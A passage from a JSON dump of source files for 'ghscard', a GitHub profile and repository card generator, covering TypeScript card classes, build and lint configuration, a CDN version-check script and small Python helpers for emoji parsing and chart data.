\"black\";\n\nexport type UiSize = \"huge\" | \"large\" | \"medium\" | \"small\" | \"tiny\" | \"mini\";\n\nexport type UserOrgCardDataKey =\n | CommonCardDataKey\n | \"blog\"\n | \"company\"\n | \"contributions\"\n | \"email\"\n | \"followers\"\n | \"following\"\n | \"location\"\n | \"organizations\"\n | \"profile_name\"\n | \"public_gists\"\n | \"public_members_count\"\n | \"public_repos\"\n | \"stars\";\n\nexport type OrgCardDataKey =\n | CommonCardDataKey\n | \"blog\"\n | \"company\"\n | \"email\"\n | \"location\"\n | \"public_members_count\"\n | \"public_repos\";\n\nexport type UserCardDataKey =\n | CommonCardDataKey\n | \"blog\"\n | \"company\"\n | \"contributions\"\n | \"email\"\n | \"followers\"\n | \"following\"\n | \"location\"\n | \"organizations\"\n | \"profile_name\"\n | \"public_gists\"\n | \"public_repos\"\n | \"stars\";\n\nexport type RepoCardDataKey =\n | CommonCardDataKey\n | \"commits_last_year\"\n | \"branches_count\"\n | \"contributors_count\"\n | \"forks_count\"\n | \"has_issues\"\n | \"has_wiki\"\n | \"language\"\n | \"languages\"\n | \"languages_count\"\n | \"latest_tag\"\n | \"license\"\n | \"open_issues_count\"\n | \"open_issues\"\n | \"organization\"\n | \"owner_name\"\n | \"owner_html_url\"\n | \"participation\"\n | \"pulls_count\"\n | \"repo_homepage\"\n | \"stargazers_count\"\n | \"subscribers_count\"\n | \"tags_count\"\n | \"topics\"\n | \"watchers_count\";\n" }, { "alpha_fraction": 0.6758865118026733, "alphanum_fraction": 0.6836879253387451, "avg_line_length": 17.799999237060547, "blob_id": "2d9f5601058c46c8d4051228638feb5e7d8c0252", "content_id": "5f5cbffe9c499ef4c959af8a90092a8c97777485", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1410, "license_type": "permissive", "max_line_length": 125, "num_lines": 75, "path": "/Makefile", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "PACKAGE := ghscard\nDOCS_DIR := docs\nDOCS_BUILD_DIR := 
$(DOCS_DIR)/_build\nPYTHON := python3\n\n\n.PHONY: build\nbuild: clean\n\t@npm run-script build\n\t@tox -e build\n\tls -lh dist/*\n\t@cp dist/ghscard.js test/html/\n\n.PHONY: check\ncheck:\n\tnpm run-script lint\n\t@tox -e lint\n\t$(PYTHON) -m pip check\n\n.PHONY: upgrade\nupgrade:\n\t@npx ncu --upgrade --timeout 60000\n\t@npm install\n\n.PHONY: clean\nclean:\n\t@npm run-script clean\n\t@tox -e clean\n\t@-rm $(PACKAGE)-*.tgz\n\n.PHONY: docs\ndocs:\n\t@tox -e docs\n\n.PHONY: fmt\nfmt:\n\t@tox -e fmt\n\tnpx prettier --tab-width 4 --print-width 100 --trailing-comma es5 --write \"**/*.ts\" --ignore-path \"$(CURDIR)/node_modules/*\"\n\tnpm run-script lint-fix\n\n.PHONY: readme\nreadme:\n\t@tox -e readme\n\n.PHONY: release\nrelease:\n\t@$(PYTHON) setup.py release --sign --search-dir $(PACKAGE)\n\t@$(MAKE) clean\n\n.PHONY: pack\npack:\n\t@pandoc -f rst -t markdown -o README.md README.rst\n\tnpm pack\n\n.PHONY: publish\npublish:\n\tpandoc -f rst -t markdown -o README.md README.rst\n\tnpm publish\n\n.PHONY: setup-ci\nsetup-ci:\n\t@$(PYTHON) -m pip install -q --disable-pip-version-check --upgrade tox\n\n.PHONY: setup\nsetup: setup-ci\n\t@$(PYTHON) -m pip install -q --disable-pip-version-check --upgrade -e .[test] releasecmd\n\tnpm install\n\t@$(PYTHON) -m pip check\n\n\n.PHONY: install\ninstall:\n\tcp dist/ghscard.js ../thombashi.github.io/js/\n\tcp dist/ghscard.js.map ../thombashi.github.io/js/\n\tcp dist/ghscard.min.js ../thombashi.github.io/js/\n" }, { "alpha_fraction": 0.8252426981925964, "alphanum_fraction": 0.8252426981925964, "avg_line_length": 33.33333206176758, "blob_id": "bf82029cb3e756e7884cddddf613e24d8332fbcc", "content_id": "9fef978c7c4296accbc8568b9c7dc5de4617f895", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 103, "license_type": "permissive", "max_line_length": 60, "num_lines": 3, "path": "/src/card/interface.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "export 
interface CardGeratorInterface {\n createCard(uniqueFrameNumber: number): HTMLIFrameElement\n}\n" }, { "alpha_fraction": 0.6398190259933472, "alphanum_fraction": 0.6398190259933472, "avg_line_length": 23.55555534362793, "blob_id": "e5539b36d4127168268822733ccc764049f8ff1f", "content_id": "087b891039b2d9e0823dd29a43cc8716f13c98d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1105, "license_type": "permissive", "max_line_length": 73, "num_lines": 45, "path": "/src/card/repository/small.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { ChartSize } from \"../../const\";\nimport { UiSize } from \"../../types\";\nimport { AbstractRepositoryCardGerator } from \"./base_repository\";\n\nexport class SmallRepoCardGerator extends AbstractRepositoryCardGerator {\n protected get headerSize(): UiSize {\n return \"medium\";\n }\n\n protected get infoSize(): UiSize {\n return \"small\";\n }\n\n protected get popupSize(): UiSize {\n return \"small\";\n }\n\n protected get versionLabelSize(): UiSize {\n return \"small\";\n }\n\n protected get topicSize(): UiSize {\n return \"tiny\";\n }\n\n protected get lineChartHeight(): number {\n return ChartSize.Line.Small.HEIGHT;\n }\n\n protected get pieChartHeight(): number {\n return ChartSize.Pie.Small.HEIGHT;\n }\n\n protected get pieChartLegendFontSize(): number {\n return ChartSize.Pie.Small.LEGEND_FONT_SIZE;\n }\n\n protected get chartTitleFontSize(): number {\n return ChartSize.Line.Small.TITLE_FONT_SIZE;\n }\n\n protected get chartTickFontSize(): number {\n return ChartSize.Line.Small.TICK_FONT_SIZE;\n }\n}\n" }, { "alpha_fraction": 0.6292135119438171, "alphanum_fraction": 0.6292135119438171, "avg_line_length": 25.700000762939453, "blob_id": "a87f61b10d5bb1ce03c26a0272139dbbe7f839fa", "content_id": "1c407302df49f109a920e4a7badb32233c11e2dd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"TypeScript", "length_bytes": 267, "license_type": "permissive", "max_line_length": 65, "num_lines": 10, "path": "/src/main.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { CardGeneratorManager } from \"./manager\";\n\nimport $ from \"jquery\";\n\n(function (window, $) {\n $(window).on(\"load\", function () {\n const generatorCard = new CardGeneratorManager(document);\n generatorCard.generateCards();\n });\n})(window, $);\n" }, { "alpha_fraction": 0.5563463568687439, "alphanum_fraction": 0.5563463568687439, "avg_line_length": 22.41666603088379, "blob_id": "e858e0a2e675a25b281a342813cd9730392660d8", "content_id": "85cc6553d45d0c6c6b5fa9747eddd0e186c9ea7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 843, "license_type": "permissive", "max_line_length": 64, "num_lines": 36, "path": "/src/card/organization/tiny.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractOrgCardGerator } from \"./base_organization\";\n\nexport class TinyOrgCardGerator extends AbstractOrgCardGerator {\n protected get headerSize(): UiSize {\n return \"tiny\";\n }\n\n protected get infoSize(): UiSize {\n return \"tiny\";\n }\n\n protected get popupSize(): UiSize {\n return \"tiny\";\n }\n\n protected get avatarColumnWide(): string {\n return \"four\";\n }\n\n protected createPopupInfoList(): HTMLElement {\n return this._createInfoList(\n {\n email: true,\n blog: true,\n created_at: true,\n updated_at: true,\n },\n this.popupSize\n );\n }\n\n protected createCardContent(): HTMLElement {\n return this._createCardContentTiny();\n }\n}\n" }, { "alpha_fraction": 0.6448087692260742, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 17.042253494262695, "blob_id": "d0d228d311d7c8a4c195fac44ea7e07d2901a4d4", "content_id": "bbeffcf047b8040d381f2d3f865fa237ae794566", "detected_licenses": [ "MIT" ], "is_generated": 
false, "is_vendor": false, "language": "INI", "length_bytes": 1281, "license_type": "permissive", "max_line_length": 95, "num_lines": 71, "path": "/tox.ini", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "[tox]\nenvlist =\n py{37,38,39,310,311}\n build\n docs\n fmt\n lint\n readme\n\n[testenv]\nextras =\n test\ncommands =\n pytest\n\n[testenv:build]\nbasepython = python3.8\ndeps =\n twine\n wheel\ncommands =\n python setup.py sdist bdist_wheel\n twine check dist/*.whl dist/*.tar.gz\n python setup.py clean --all\n\n[testenv:clean]\nskip_install = true\ndeps =\n cleanpy>=0.4\ncommands =\n cleanpy --all --exclude-envs .\n\n[testenv:docs]\nbasepython = python3.8\ndeps =\n -r{toxinidir}/requirements/docs_requirements.txt\ncommands =\n python setup.py build_sphinx --source-dir=docs/ --build-dir=docs/_build --all-files\n\n[testenv:fmt]\nskip_install = true\ndeps =\n autoflake>=2\n black>=23.1\n isort>=5\ncommands =\n black setup.py test ghscard\n autoflake --in-place --recursive --remove-all-unused-imports --ignore-init-module-imports .\n isort .\n\n[testenv:lint]\nskip_install = true\ndeps =\n codespell\n mypy>=1\n pylama\n types-simplejson\n types-click\ncommands =\n python setup.py check\n mypy ghscard setup.py\n -codespell ghscard src docs/pages examples test -q2 --check-filenames --skip \"test/html/*\"\n -pylama\n\n[testenv:readme]\nskip_install = true\nchangedir = docs\ndeps =\n readmemaker>=1.1.0\ncommands =\n python make_readme.py\n" }, { "alpha_fraction": 0.6689189076423645, "alphanum_fraction": 0.6722972989082336, "avg_line_length": 31.88888931274414, "blob_id": "0a396349726d5924a390588eff0fe6ec46317b54", "content_id": "9cacb423bf0ef4f891b7588397c6ea59e04d3e36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 296, "license_type": "permissive", "max_line_length": 100, "num_lines": 9, "path": "/fetch_js_lib_versions.sh", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", 
"text": "#!/usr/bin/env sh\n\nfor pkg in moment.js pleasejs; do\n curl -sS https://api.cdnjs.com/libraries/${pkg}?fields=name,filename,version | jq .\ndone\n\nfor pkg in chart.js jquery fomantic-ui; do\n echo $pkg $(curl -sS https://data.jsdelivr.com/v1/package/npm/${pkg} | jq '.[\"tags\"][\"latest\"]')\ndone\n" }, { "alpha_fraction": 0.6177786588668823, "alphanum_fraction": 0.6195292472839355, "avg_line_length": 33.736488342285156, "blob_id": "7ada22bdcc77b5fb635b1c08b00fd8811a5566c9", "content_id": "10f77e3e0568f1549f5bcba1b0d6f100ffb543e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 5141, "license_type": "permissive", "max_line_length": 95, "num_lines": 148, "path": "/src/card/user/base_user.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AbstractUserOrgCardGerator } from \"../base_user_org\";\n\nexport class AbstractUserCardGerator extends AbstractUserOrgCardGerator {\n protected get statsColumnWide(): string {\n return \"seven\";\n }\n\n protected get followers(): string {\n return this.getCardData(\"followers\");\n }\n\n protected get following(): string {\n return this.getCardData(\"following\");\n }\n\n protected get publicGists(): string {\n return this.getCardData(\"public_gists\");\n }\n\n protected get stars(): string {\n return this.getCardData(\"stars\");\n }\n\n protected createCardHeader(): HTMLElement {\n const header = this.createAnchorElement(\n this.htmlUrl,\n `ui ${this.headerSize} dividing header`\n );\n\n if (this.getCardData(\"profile_name\")) {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"profile_name\")));\n\n const subheader: HTMLElement = this.createElement(\"div\", \"sub header\");\n subheader.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n\n header.appendChild(subheader);\n } else {\n header.appendChild(this._doc.createTextNode(this.getCardData(\"id\")));\n }\n\n return header;\n }\n\n 
protected createExtraCardContent(): HTMLElement {\n const organizationsContent = this.createOrganizations();\n let validContentCount = 0;\n\n if (organizationsContent) {\n validContentCount++;\n }\n\n if (validContentCount === 0) {\n return null;\n }\n\n const extraContent = this.createElement(\"div\", \"extra content\");\n\n if (organizationsContent) {\n const header = this.createElement(\"div\", \"ui tiny header\");\n header.appendChild(this._doc.createTextNode(\"Organizations\"));\n\n const organizationSegment = this.createExtraContentSegment(validContentCount);\n organizationSegment.appendChild(header);\n organizationSegment.appendChild(organizationsContent);\n\n extraContent.appendChild(organizationSegment);\n }\n\n return extraContent;\n }\n\n private createExtraContentSegment(contenetCount: number): HTMLElement {\n if (contenetCount <= 1) {\n return this.createElement(\"div\", \"ui vertical basic compact segment\");\n }\n\n return this.createElement(\"div\", \"ui vertical segment\");\n }\n\n protected createStatisticsElement(): HTMLElement {\n const items = this.createElement(\"div\", `ui ${this.infoSize} aligned selection list`);\n\n if (Number(this.publicRepos) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=repositories\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Repositories\"));\n item.appendChild(this.createLabelElement(this.publicRepos, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.stars) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=stars\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Stars\"));\n item.appendChild(this.createLabelElement(this.stars, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.followers) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=followers\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Followers\"));\n item.appendChild(this.createLabelElement(this.followers, 
this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.following) > 0) {\n const item = this.createAnchorElement(this.htmlUrl + \"?tab=following\", \"item\");\n item.appendChild(this._doc.createTextNode(\"Following\"));\n item.appendChild(this.createLabelElement(this.following, this.infoSize));\n\n items.appendChild(item);\n }\n\n if (Number(this.publicGists) > 0) {\n const item = this.createAnchorElement(\n `//gist.github.com/${this.getCardData(\"id\")}`,\n \"item\"\n );\n item.appendChild(this._doc.createTextNode(\"Gists\"));\n item.appendChild(this.createLabelElement(this.publicGists, this.infoSize));\n\n items.appendChild(item);\n }\n\n return items;\n }\n\n protected createOrganizations(): HTMLElement {\n const orgList = this.createElement(\"div\", \"ui mini rounded images\");\n\n Array.prototype.forEach.call(this.getCardData(\"organizations\"), (organizationData) => {\n const orgLink = this.createAnchorElement(organizationData[\"html_url\"], \"ui image\");\n orgLink.setAttribute(\"data-content\", organizationData[\"name\"]);\n orgLink.setAttribute(\"data-position\", \"top center\");\n orgLink.setAttribute(\"data-variation\", \"inverted mini\");\n orgLink.appendChild(this.createImageElement(organizationData[\"avatar_url\"]));\n\n orgList.appendChild(orgLink);\n });\n\n if (orgList.children.length === 0) {\n return null;\n }\n\n return orgList;\n }\n}\n" }, { "alpha_fraction": 0.5665071606636047, "alphanum_fraction": 0.5684210658073425, "avg_line_length": 26.5, "blob_id": "5e3e8b0710470f61bc1608cb18871452f266c9bc", "content_id": "f215beb9c753f753b534a1fefef1cda7ad0ed850", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1045, "license_type": "permissive", "max_line_length": 68, "num_lines": 38, "path": "/ghscard/_emoji.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport re\nfrom typing import Mapping, cast\n\n\nclass EmojiParser:\n __re_emoji = re.compile(r\":[\\+a-zA-Z0-9_-]+:\")\n\n def __init__(self, emoji_kv_mapping: Mapping[str, str]) -> None:\n if not emoji_kv_mapping:\n raise ValueError(\"required emoji key-value mapping\")\n\n self.__emoji_mapping = emoji_kv_mapping\n\n def get_url(self, emoji: str) -> str:\n try:\n emoji = emoji.strip().strip(\":\")\n except (TypeError, AttributeError) as e:\n raise ValueError(e)\n\n return cast(str, self.__emoji_mapping.get(emoji))\n\n def parse(self, text: str) -> list:\n emoji_list = []\n\n try:\n for emoji_candidate in self.__re_emoji.findall(text):\n emoji_candidate = emoji_candidate.strip(\":\")\n\n if emoji_candidate in self.__emoji_mapping:\n emoji_list.append(emoji_candidate)\n except (TypeError, AttributeError) as e:\n raise ValueError(e)\n\n return emoji_list\n" }, { "alpha_fraction": 0.517524242401123, "alphanum_fraction": 0.517524242401123, "avg_line_length": 22.946428298950195, "blob_id": "d65e011e083453602fd82d33fdf692a7e702dedd", "content_id": "17a75471eccbeae307da6040ed6528a1b1e8e7be", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1341, "license_type": "permissive", "max_line_length": 84, "num_lines": 56, "path": "/webpack.config.js", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "const path = require(\"path\");\nconst BundleAnalyzerPlugin = require(\"webpack-bundle-analyzer\").BundleAnalyzerPlugin\nconst TerserPlugin = require(\"terser-webpack-plugin\");\n\nmodule.exports = (env, argv) => {\n const IS_DEVELOPMENT = argv.mode === \"development\";\n\n return {\n entry: path.join(__dirname, \"src\", \"main.ts\"),\n output: {\n library: \"ghscard\",\n libraryTarget: \"umd\",\n path: path.join(__dirname, \"dist\"),\n filename: IS_DEVELOPMENT ? \"ghscard.js\" : \"ghscard.min.js\"\n },\n devtool: IS_DEVELOPMENT ? 
\"source-map\" : \"none\",\n externals: {\n jquery: \"jQuery\"\n },\n plugins: [\n new BundleAnalyzerPlugin({\n analyzerMode: \"disabled\",\n generateStatsFile: true,\n statsFilename: IS_DEVELOPMENT ? \"stats-dev.json\" : \"stats.json\",\n statsOptions: { source: false }\n })\n ],\n optimization: {\n minimizer: IS_DEVELOPMENT\n ? []\n : [\n new TerserPlugin({\n terserOptions: {\n compress: { drop_console: true },\n },\n extractComments: \"all\",\n })\n ]\n },\n module: {\n rules: [{\n test: /\\.ts$/,\n use: \"ts-loader\"\n }]\n },\n resolve: {\n modules: [\n \"node_modules\",\n ],\n extensions: [\n \".ts\",\n \".js\"\n ]\n }\n }\n};\n" }, { "alpha_fraction": 0.6236323714256287, "alphanum_fraction": 0.6236323714256287, "avg_line_length": 21.850000381469727, "blob_id": "2ba39b30209ee79c6d520aa052273e351b101468", "content_id": "f29bd4aac52abae3b8f00644ea8a1ccc95aab6d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 457, "license_type": "permissive", "max_line_length": 65, "num_lines": 20, "path": "/src/card/organization/small.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractOrgCardGerator } from \"./base_organization\";\n\nexport class SmallOrgCardGerator extends AbstractOrgCardGerator {\n protected get headerSize(): UiSize {\n return \"small\";\n }\n\n protected get infoSize(): UiSize {\n return \"small\";\n }\n\n protected get popupSize(): UiSize {\n return \"small\";\n }\n\n protected get avatarColumnWide(): string {\n return \"six\";\n }\n}\n" }, { "alpha_fraction": 0.5795454382896423, "alphanum_fraction": 0.5795454382896423, "avg_line_length": 87, "blob_id": "6161456c4c78115a5e6db698c95645a4e726cc92", "content_id": "53afda95a77a7ab9f739c828f74684b4e5140c21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "permissive", 
"max_line_length": 87, "num_lines": 1, "path": "/ghscard/__init__.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "from .__version__ import __author__, __copyright__, __email__, __license__, __version__\n" }, { "alpha_fraction": 0.627457857131958, "alphanum_fraction": 0.6436095237731934, "avg_line_length": 36.973331451416016, "blob_id": "149095ede547e742a4a9d4c8a01be3b298d44372", "content_id": "8bf0b5a577b10f0caebe85b77acdf3fb7f15aa93", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2848, "license_type": "permissive", "max_line_length": 112, "num_lines": 75, "path": "/src/const.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "export const AVATAR_ELEMENT_ID = \"__avatar_id__\";\nexport const CARD_ELEMENT_ID = \"__card_id__\";\n\nexport namespace Margin {\n export const CARD_CONTENT = 4;\n export const FRAME = 6;\n export const LABEL = 4;\n}\n\nconst CDNJS_PREFIX = \"//cdnjs.cloudflare.com/ajax/libs\";\nconst JSDELIVR_PREFIX = \"//cdn.jsdelivr.net/npm\";\nconst UI_VERSION = \"2.8.6\";\n\nexport namespace JsUrl {\n export const CHART = `${JSDELIVR_PREFIX}/[email protected]/dist/Chart.min.js`;\n export const JQUERY = `${CDNJS_PREFIX}/jquery/3.5.1/jquery.min.js`;\n export const MOMENT = `${CDNJS_PREFIX}/moment.js/2.24.0/moment.min.js`;\n export const PLEASE = `${CDNJS_PREFIX}/pleasejs/0.4.2/Please.min.js`;\n export const SEMANTIC_UI: string = `${JSDELIVR_PREFIX}/fomantic-ui@${UI_VERSION}/dist/semantic.min.js`;\n}\n\nexport const DEFAULT_SEMANTIC_UI_CSS_URL = `${JSDELIVR_PREFIX}/fomantic-ui@${UI_VERSION}/dist/semantic.min.css`;\n\nexport namespace Emoji {\n export const WIDTH = 16;\n export const HEIGHT = 16;\n}\n\nconst STEP_HEIGHT = 20;\n\nnamespace BaseChartSize {\n export namespace Line {\n export const HEIGHT = 110;\n export const TITLE_FONT_SIZE = 10;\n export const TICK_FONT_SIZE = 8;\n }\n export namespace Pie {\n export const HEIGHT = 160;\n 
export const LEGEND_FONT_SIZE = 10;\n }\n}\n\nexport namespace ChartSize {\n export namespace Line {\n export namespace Medium {\n export const HEIGHT = BaseChartSize.Line.HEIGHT + STEP_HEIGHT * 2;\n export const TITLE_FONT_SIZE = BaseChartSize.Line.TITLE_FONT_SIZE + 2;\n export const TICK_FONT_SIZE = BaseChartSize.Line.TICK_FONT_SIZE + 2;\n }\n export namespace Small {\n export const HEIGHT = BaseChartSize.Line.HEIGHT + STEP_HEIGHT * 1;\n export const TITLE_FONT_SIZE = BaseChartSize.Line.TITLE_FONT_SIZE + 1;\n export const TICK_FONT_SIZE = BaseChartSize.Line.TICK_FONT_SIZE + 1;\n }\n export namespace Tiny {\n export const HEIGHT = BaseChartSize.Line.HEIGHT;\n export const TITLE_FONT_SIZE = BaseChartSize.Line.TITLE_FONT_SIZE;\n export const TICK_FONT_SIZE = BaseChartSize.Line.TICK_FONT_SIZE;\n }\n }\n export namespace Pie {\n export namespace Medium {\n export const HEIGHT = BaseChartSize.Pie.HEIGHT + STEP_HEIGHT * 2;\n export const LEGEND_FONT_SIZE = BaseChartSize.Pie.LEGEND_FONT_SIZE + 2;\n }\n export namespace Small {\n export const HEIGHT = BaseChartSize.Pie.HEIGHT + STEP_HEIGHT * 1;\n export const LEGEND_FONT_SIZE = BaseChartSize.Pie.LEGEND_FONT_SIZE + 1;\n }\n export namespace Tiny {\n export const HEIGHT = BaseChartSize.Pie.HEIGHT + STEP_HEIGHT;\n export const LEGEND_FONT_SIZE = BaseChartSize.Pie.LEGEND_FONT_SIZE;\n }\n }\n}\n" }, { "alpha_fraction": 0.5766423344612122, "alphanum_fraction": 0.5766423344612122, "avg_line_length": 14.222222328186035, "blob_id": "0a7cc86bf72ba694d33fafaf6c57e53013d79835", "content_id": "ffde70ec0688e1c78c03e6c04263e39240349e83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "permissive", "max_line_length": 44, "num_lines": 9, "path": "/ghscard/_error.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\n\nclass ApiStatusError(Exception):\n \"\"\"\n Raised when GitHub API is in red status.\n \"\"\"\n" }, { "alpha_fraction": 0.6909090876579285, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 26.5, "blob_id": "9e3b0ed196514577088b312558adbc8fb947aded", "content_id": "6cb8522ad7e648570172f8ca7dae040e5e343cbb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 55, "license_type": "permissive", "max_line_length": 31, "num_lines": 2, "path": "/docs/pages/usage/index.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": ".. include:: usage.rst\n.. include:: advanced_usage.rst\n" }, { "alpha_fraction": 0.610088586807251, "alphanum_fraction": 0.6121336221694946, "avg_line_length": 24.29310417175293, "blob_id": "2caf71669dcb10a14d6415939d869e583599dc76", "content_id": "651463bfcaa1e49b33c33f391693c03082716654", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1467, "license_type": "permissive", "max_line_length": 98, "num_lines": 58, "path": "/ghscard/fetcher/_common.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nfrom typing import Counter, Dict, Union\n\nfrom .._const import CommonCardKey\n\n\nChartData = Dict[str, list]\n\n\ndef dump_organization(organization) -> Dict[str, str]:\n if not organization:\n return {}\n\n if organization.name:\n organization_name = organization.name\n else:\n organization_name = organization.html_url.split(\"/\")[-1]\n\n return {\n CommonCardKey.AVATAR_URL: organization.avatar_url,\n CommonCardKey.HTML_URL: organization.html_url,\n CommonCardKey.NAME: organization_name,\n \"public_repos\": organization.public_repos,\n }\n\n\ndef to_chart_data(\n label_count_mapping: Union[Counter, Dict[str, int]], aggregate_threshold: int\n) -> ChartData:\n if not label_count_mapping:\n return {\"labels\": [], \"data\": []}\n\n label_name_list = []\n label_count_list = []\n others_count = None\n\n for i, kv in enumerate(sorted(label_count_mapping.items(), key=lambda x: x[1], reverse=True)):\n key, value = kv\n\n if (i + 1) > aggregate_threshold:\n if others_count is None:\n others_count = value\n else:\n others_count += value\n\n continue\n\n label_name_list.append(key)\n label_count_list.append(value)\n\n if others_count:\n label_name_list.append(\"others\")\n label_count_list.append(others_count)\n\n return {\"labels\": label_name_list, \"data\": label_count_list}\n" }, { "alpha_fraction": 0.5443708896636963, "alphanum_fraction": 0.573509931564331, "avg_line_length": 14.729166984558105, "blob_id": "3b286285444e9ea5925ca90339cd3acd1f897b7e", "content_id": "da2a083629960c58f704c214b6743a2354da8150", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 755, "license_type": "permissive", "max_line_length": 59, "num_lines": 48, "path": "/pyproject.toml", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "[build-system]\nrequires = [\"setuptools\", \"wheel\"]\n\n[tool.black]\nline-length = 100\nexclude = '''\n/(\n \\.eggs\n | 
\\.git\n | \\.mypy_cache\n | \\.tox\n | \\.venv\n | \\.pytype\n | _build\n | buck-out\n | build\n | dist\n)/\n| docs/conf.py\n'''\ntarget-version = ['py37', 'py38', 'py39', 'py310', 'py311']\n\n[tool.isort]\nknown_third_party = [\n 'appconfigpy',\n 'github',\n 'logbook',\n 'pytest',\n 'retryrequests',\n]\ninclude_trailing_comma = true\nline_length = 100\nlines_after_imports = 2\nmulti_line_output = 3\nskip_glob = [\n '*/.eggs/*',\n '*/.pytype/*',\n '*/.tox/*',\n]\n\n[tool.mypy]\nignore_missing_imports = true\npython_version = 3.7\n\npretty = true\nshow_error_codes = true\nshow_error_context = true\nwarn_unused_configs = true\n" }, { "alpha_fraction": 0.5844678282737732, "alphanum_fraction": 0.6178836822509766, "avg_line_length": 37.93975830078125, "blob_id": "84b558f1343f1057db13373a22e5ddae3e3aa7d6", "content_id": "ed223f12d8756791296324a15d1daa11190789d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3232, "license_type": "permissive", "max_line_length": 97, "num_lines": 83, "path": "/test/test_emoji.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport pytest\n\nfrom ghscard._emoji import EmojiParser\n\n\nemojis = {\n \"+1\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f44d.png?v7\",\n \"-1\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f44e.png?v7\",\n \"100\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f4af.png?v7\",\n \"1234\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f522.png?v7\",\n \"1st_place_medal\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f947.png?v7\",\n \"2nd_place_medal\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f948.png?v7\",\n \"3rd_place_medal\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f949.png?v7\",\n \"8ball\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f3b1.png?v7\",\n \"a\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f170.png?v7\",\n \"ab\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f18e.png?v7\",\n \"abc\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f524.png?v7\",\n \"abcd\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f521.png?v7\",\n \"accept\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f251.png?v7\",\n \"aerial_tramway\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f6a1.png?v7\",\n \"afghanistan\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/1f1e6-1f1eb.png?v7\",\n \"airplane\": \"https://assets-cdn.github.com/images/icons/emoji/unicode/2708.png?v7\",\n}\n\n\[email protected]\ndef 